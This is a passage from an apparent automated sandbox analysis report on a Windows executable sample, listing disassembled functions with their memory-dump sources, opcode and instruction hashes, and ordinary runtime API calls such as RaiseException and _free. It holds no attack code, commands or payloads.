                    • Opcode ID: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                    • Instruction ID: 0f1af51de5af96b730dc073be6187f45225b05d1e39be70f77c0bb50ba676d41
                    • Opcode Fuzzy Hash: 4febeba0e6df1972b290d54c079ebb9eef800fd61dd105ca4b93d43a1305ea1a
                    • Instruction Fuzzy Hash: 9BF14F71E002199FEF14CFA9C9806AEB7B1FF88714F25826EE915A7344D735AE01CB94
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 38f1bd2685e55997c2703fc258bc759cbf20cb8828056bff6a68c166f696af58
                    • Instruction ID: cc331196bb86445c8008bb85b4142b5b6b4ed80e4b525c1184b5bc8d1b9e2124
                    • Opcode Fuzzy Hash: 38f1bd2685e55997c2703fc258bc759cbf20cb8828056bff6a68c166f696af58
                    • Instruction Fuzzy Hash: 90F13F75E402199FDF14CFA8C9806AEFBB1FF98314F2582ADD929A7344D731A941CB90
                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00447044,?,?,00000008,?,?,00445ECA,00000000), ref: 00447276
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
                    • API String ID: 3997070919-0
                    • Opcode ID: 36254a7a5f10b6b788354df259e86d50cce653991a31e3785c17a1f2ceddeed1
                    • Instruction ID: 7a8e5148774215697cf91bc212fe3b67d35b5c5a8621f41dfb32136176b2c313
                    • Opcode Fuzzy Hash: 36254a7a5f10b6b788354df259e86d50cce653991a31e3785c17a1f2ceddeed1
                    • Instruction Fuzzy Hash: 9CB15D31614605DFE728CF28C486B657BE0FF45365F258699E89ACF3A1C339E982CB44
                    APIs
                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,021C72AB,?,?,00000008,?,?,021C6131,00000000), ref: 021C74DD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise
                    • String ID:
                    • API String ID: 3997070919-0
                    • Opcode ID: 36254a7a5f10b6b788354df259e86d50cce653991a31e3785c17a1f2ceddeed1
                    • Instruction ID: 3b09285225e60103b1b1118c2a07a7151f83e3270d8e3101098e24ee22fa3424
                    • Opcode Fuzzy Hash: 36254a7a5f10b6b788354df259e86d50cce653991a31e3785c17a1f2ceddeed1
                    • Instruction Fuzzy Hash: 1DB14A396506048FD719CF28C486A65BBA4FF55368F25865CE89ACF2E1C375E982CF40
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0041DDA7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor
                    • String ID:
                    • API String ID: 2325560087-0
                    • Opcode ID: 9aa71377ddf51d54108bd68bc2459ad0f115ceeb009950e0c4d0192850e4ba90
                    • Instruction ID: 73b31feacec7ce9fe7b0550b3c6203be5604da4ad9e3037c20952e2b0bfc5a30
                    • Opcode Fuzzy Hash: 9aa71377ddf51d54108bd68bc2459ad0f115ceeb009950e0c4d0192850e4ba90
                    • Instruction Fuzzy Hash: E251B0B2D05B068BDB15CF58D8917AAB7F1FB48304F24856BC405EB350E3B8A980CF59
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c254cc85ab78f1b64420c7fda183827d5ac03fcf9b54031427e7e9148f272146
                    • Instruction ID: 3d492b1ce9647cc9b8e1ba87239a284fe88898690c8d91de180f89449a84ea2b
                    • Opcode Fuzzy Hash: c254cc85ab78f1b64420c7fda183827d5ac03fcf9b54031427e7e9148f272146
                    • Instruction Fuzzy Hash: 2241C6B1C0421DAEDB20DF69DC89AAAB7B9EF49304F1452DEE41DD3201DA389E84CF54
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c254cc85ab78f1b64420c7fda183827d5ac03fcf9b54031427e7e9148f272146
                    • Instruction ID: bec4704a61f0a166982d65d4dd4ca8a597df46f3e492a0823bae9e66f01ee0ba
                    • Opcode Fuzzy Hash: c254cc85ab78f1b64420c7fda183827d5ac03fcf9b54031427e7e9148f272146
                    • Instruction Fuzzy Hash: 8941D0B5844219AEDB25DF79CC88AEABBB9EF45300F1442EDE40DD3210DB359E818F10
                    APIs
                    • NtFlushProcessWriteBuffers.NTDLL ref: 0041CBAA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: BuffersFlushProcessWrite
                    • String ID:
                    • API String ID: 2982998374-0
                    • Opcode ID: 20c4ea3e2129b60a1e4d1eea87152ba57400039f21031a1d2e21638d1c4937de
                    • Instruction ID: 734eec717fe04ada3b4bcf7b1b1ccceb46d859c39f6a646686bea7d52c1b0365
                    • Opcode Fuzzy Hash: 20c4ea3e2129b60a1e4d1eea87152ba57400039f21031a1d2e21638d1c4937de
                    • Instruction Fuzzy Hash: DFB09236A1B93047CA512B14BC4859E7714AA80B1270A01A6E805A72348A54AD828BDD
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_0001DD16,0041D755), ref: 0041DD0F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 43c617bf8b0786d196ab8e975300d48b22b3ddc598e3c16071a78d30c9f3b4c1
                    • Instruction ID: acbc3c9ff04c2f6a81d4fdca068cfbd79b9dcce843e89fee5e28ccbd35d34f0d
                    • Opcode Fuzzy Hash: 43c617bf8b0786d196ab8e975300d48b22b3ddc598e3c16071a78d30c9f3b4c1
                    • Instruction Fuzzy Hash:
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                    • Instruction ID: b34b47e9f09f915a8cdca993c5e9340bbf8146411caf7b554e1449dba65cbcf0
                    • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                    • Instruction Fuzzy Hash: C15128B02087446ADB3C4A2888957BFE7AAAB1D304F14351FF4C297392CE5D9D4A925E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0
                    • API String ID: 0-4108050209
                    • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                    • Instruction ID: ffc1c96e5826b9711f425089feadf0b79b703ef1480cc63af3cfeb768509465f
                    • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                    • Instruction Fuzzy Hash: 7D516730AC0A449EDF3B9A2C89A47FF67BEAF52E08F0B0459C442D7291CB21DE45C616
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 4
                    • API String ID: 0-4088798008
                    • Opcode ID: 5578bbf268cf1d7a6cc11f772dbe90f91f38951ddd0f84b7ddcb6c1c960a0822
                    • Instruction ID: d3640ea578d556721f4490aaac2cfbcd5f657f790f84d66c55eb6511df690334
                    • Opcode Fuzzy Hash: 5578bbf268cf1d7a6cc11f772dbe90f91f38951ddd0f84b7ddcb6c1c960a0822
                    • Instruction Fuzzy Hash: 75612C71E002259FCB18CF49E680A6EB7B1BF58715F66816ED805A7305C738EE46CF94
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 4
                    • API String ID: 0-4088798008
                    • Opcode ID: 5578bbf268cf1d7a6cc11f772dbe90f91f38951ddd0f84b7ddcb6c1c960a0822
                    • Instruction ID: 23060c6b4a008b3e6c3813fe0b25f583b1db5b2ca6b03c3de268519ef135b1e4
                    • Opcode Fuzzy Hash: 5578bbf268cf1d7a6cc11f772dbe90f91f38951ddd0f84b7ddcb6c1c960a0822
                    • Instruction Fuzzy Hash: 2F6147B9E40215DFCB28CF59C591AAEB7B1BF58314F258169C815A7701C770FA82CF94
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: aca00c27e9f0dc5049bb43eb222e30ca6b7b035fc8865b45e586624c015778d4
                    • Instruction ID: eb605be20576830f6b34c25644e00d6787cf5f33f001ef57d4ebdc8b7b80a678
                    • Opcode Fuzzy Hash: aca00c27e9f0dc5049bb43eb222e30ca6b7b035fc8865b45e586624c015778d4
                    • Instruction Fuzzy Hash: B0225EB3F515145BDB0CCA5DDCA27ECB2E3AFD8214B0E813DA40AE3345EA79D9158648
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: aca00c27e9f0dc5049bb43eb222e30ca6b7b035fc8865b45e586624c015778d4
                    • Instruction ID: eb605be20576830f6b34c25644e00d6787cf5f33f001ef57d4ebdc8b7b80a678
                    • Opcode Fuzzy Hash: aca00c27e9f0dc5049bb43eb222e30ca6b7b035fc8865b45e586624c015778d4
                    • Instruction Fuzzy Hash: B0225EB3F515145BDB0CCA5DDCA27ECB2E3AFD8214B0E813DA40AE3345EA79D9158648
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1ff74d21853a1a9411e81bdca10e899a59f84e873a7064e611779bfdc9a01e76
                    • Instruction ID: f9f22bcb052e71eb439f106f0b20dd6b4beb7377a8a8d7e69e270393853b03d6
                    • Opcode Fuzzy Hash: 1ff74d21853a1a9411e81bdca10e899a59f84e873a7064e611779bfdc9a01e76
                    • Instruction Fuzzy Hash: 618123B0E042459FEB15CF69D8807EEBBF1BF99300F15027AC910A7392D3789945CBA8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1ff74d21853a1a9411e81bdca10e899a59f84e873a7064e611779bfdc9a01e76
                    • Instruction ID: e3dddbd5baf9a98f9d992086ebea7df2c35998019ccc0b16ffa1ad22538812ac
                    • Opcode Fuzzy Hash: 1ff74d21853a1a9411e81bdca10e899a59f84e873a7064e611779bfdc9a01e76
                    • Instruction Fuzzy Hash: 5C811F71A402468FDB15DFA8D8D0BEEBBB2FF1A304F1502A9D810A7792C7759545CBA0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 52dbd9b1eed41be0fe82de8a4e6ef126f6fae99cdba63995ffaced5ebaf03370
                    • Instruction ID: be9a9c8fc00186763e8d7bb87cc8d3a0b677fa6828bf284c090cc4d7b2bb0282
                    • Opcode Fuzzy Hash: 52dbd9b1eed41be0fe82de8a4e6ef126f6fae99cdba63995ffaced5ebaf03370
                    • Instruction Fuzzy Hash: D121B673F2043947770CC47E8C5227DB6E1C78C541745423AE8A6EA2C1D968D917E2E4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 52dbd9b1eed41be0fe82de8a4e6ef126f6fae99cdba63995ffaced5ebaf03370
                    • Instruction ID: 67fa4ce0fcaf57ceb0842ed3480ee8f63975ecc89b7ca3d85d9dea6eab296052
                    • Opcode Fuzzy Hash: 52dbd9b1eed41be0fe82de8a4e6ef126f6fae99cdba63995ffaced5ebaf03370
                    • Instruction Fuzzy Hash: BF21B673F204394B770CC47ECC5227DB6E1C68C501745423AE8A6EA2C1D968D917E2E4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a58c8da4f76282e75a4e86e97fff01a13a6512019c1140d55cc266cde0378697
                    • Instruction ID: f958b488d66865dd5c15af34d8bdfeb75cad4d2fb9f4de2ca6ead72c17438f02
                    • Opcode Fuzzy Hash: a58c8da4f76282e75a4e86e97fff01a13a6512019c1140d55cc266cde0378697
                    • Instruction Fuzzy Hash: 2411C633F30C255B775C81AD8C172BAA5D2EBD824070F433AD826E7284E9A4DE23D290
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a58c8da4f76282e75a4e86e97fff01a13a6512019c1140d55cc266cde0378697
                    • Instruction ID: f13e610b0e1dd9eed484b3d97c145bb1b68bee8718f47c6eaef3ef52a6464fc2
                    • Opcode Fuzzy Hash: a58c8da4f76282e75a4e86e97fff01a13a6512019c1140d55cc266cde0378697
                    • Instruction Fuzzy Hash: 6E117323F30C255A675C81AD8C172BAA5D6EBD815071F533AD826E73C4E9A4DF13D290
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction ID: e52f5ae1c551d0b315bb206a3a6972e81541c048b5448aa17bd28fef73111c1e
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: 75112B7720018243F6049A2DC8B45BFA795EFC63217AC437FD1414B758DA2AD945960C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction ID: 53cf31c73d59594898f109c074cd69a17c96dfb5e01fd8ae72063d983e856a5a
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: 101104FF28004147963B8A2DD8F47BBE395EAE6228B3F537ED0418B758D322E145D600
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353337149.000000000052C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0052C000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_52c000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction ID: 2efc883795b3c0ec36e44a428e3269ca7a61f186585f75efc177d169fc0189ec
                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction Fuzzy Hash: 92119A72340110AFD704CF55EC81EAA7BEAFF9A320B2981A5E908DB342E675EC01C760
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction ID: d67b9e7fab7520545b681291c8a6805b0b5d10f613be528371692bcb0754d33a
                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction Fuzzy Hash: 4D01F7726506088FDF21DF20C855BAB33E5FB89305F1541A4D90697241E370A8458F80
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                    • Instruction ID: 18748302d0d64b74df810d503f589c32a7cabfcbb23ff82dab2ad40ae5c0e835
                    • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                    • Instruction Fuzzy Hash: 51E08C72961228EBCB15DB99C90498AF3ECEB4DB08F65109BF901D3250C274DE00C7D4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                    • Instruction ID: c1feb8dc06a525f54c17e96f181aaa2a419faf9fa8b1fc63aa488a33c91edf40
                    • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                    • Instruction Fuzzy Hash: F0E04672956228EBCB16DB98890498AB3FDEF49B04B1544A6F502D7110C370DF00CBD0
                    APIs
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041F2BB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::invalid_argument::invalid_argument
                    • String ID: pEvents
                    • API String ID: 2141394445-2498624650
                    • Opcode ID: 6fac62366cbd6f5e6cb8ab906c87716b022ac4ce341200765e397ba53b1eaef3
                    • Instruction ID: 66998cc49b15140c198e060e127dcf308e046c772bddf22695f73d3154dbb627
                    • Opcode Fuzzy Hash: 6fac62366cbd6f5e6cb8ab906c87716b022ac4ce341200765e397ba53b1eaef3
                    • Instruction Fuzzy Hash: 0D819F35D00218DBCF14DFA5C981BEEB7B1AF54314F14406AE801A7282D77DAD8ACB59
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 0043F3A3
                      • Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EF59
                      • Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EF6B
                      • Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EF7D
                      • Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EF8F
                      • Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EFA1
                      • Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EFB3
                      • Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EFC5
                      • Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EFD7
                      • Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EFE9
                      • Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043EFFB
                      • Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043F00D
                      • Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043F01F
                      • Part of subcall function 0043EF3C: _free.LIBCMT ref: 0043F031
                    • _free.LIBCMT ref: 0043F398
                      • Part of subcall function 0043ADF5: HeapFree.KERNEL32(00000000,00000000,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?), ref: 0043AE0B
                      • Part of subcall function 0043ADF5: GetLastError.KERNEL32(?,?,0043F0CD,?,00000000,?,?,?,0043F0F4,?,00000007,?,?,0043F4F6,?,?), ref: 0043AE1D
                    • _free.LIBCMT ref: 0043F3BA
                    • _free.LIBCMT ref: 0043F3CF
                    • _free.LIBCMT ref: 0043F3DA
                    • _free.LIBCMT ref: 0043F3FC
                    • _free.LIBCMT ref: 0043F40F
                    • _free.LIBCMT ref: 0043F41D
                    • _free.LIBCMT ref: 0043F428
                    • _free.LIBCMT ref: 0043F460
                    • _free.LIBCMT ref: 0043F467
                    • _free.LIBCMT ref: 0043F484
                    • _free.LIBCMT ref: 0043F49C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID: 8"F$`'F
                    • API String ID: 161543041-3117062166
                    • Opcode ID: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
                    • Instruction ID: 543839021cf0bf63342fab8d7291383f9c2b30be018e8c543b9015e977d3828c
                    • Opcode Fuzzy Hash: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
                    • Instruction Fuzzy Hash: 0C31A232A00201DFEB206A3AD845B5B73E6EF18315F10642FE485D7691DF78EC94CB19
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 021BF60A
                      • Part of subcall function 021BF1A3: _free.LIBCMT ref: 021BF1C0
                      • Part of subcall function 021BF1A3: _free.LIBCMT ref: 021BF1D2
                      • Part of subcall function 021BF1A3: _free.LIBCMT ref: 021BF1E4
                      • Part of subcall function 021BF1A3: _free.LIBCMT ref: 021BF1F6
                      • Part of subcall function 021BF1A3: _free.LIBCMT ref: 021BF208
                      • Part of subcall function 021BF1A3: _free.LIBCMT ref: 021BF21A
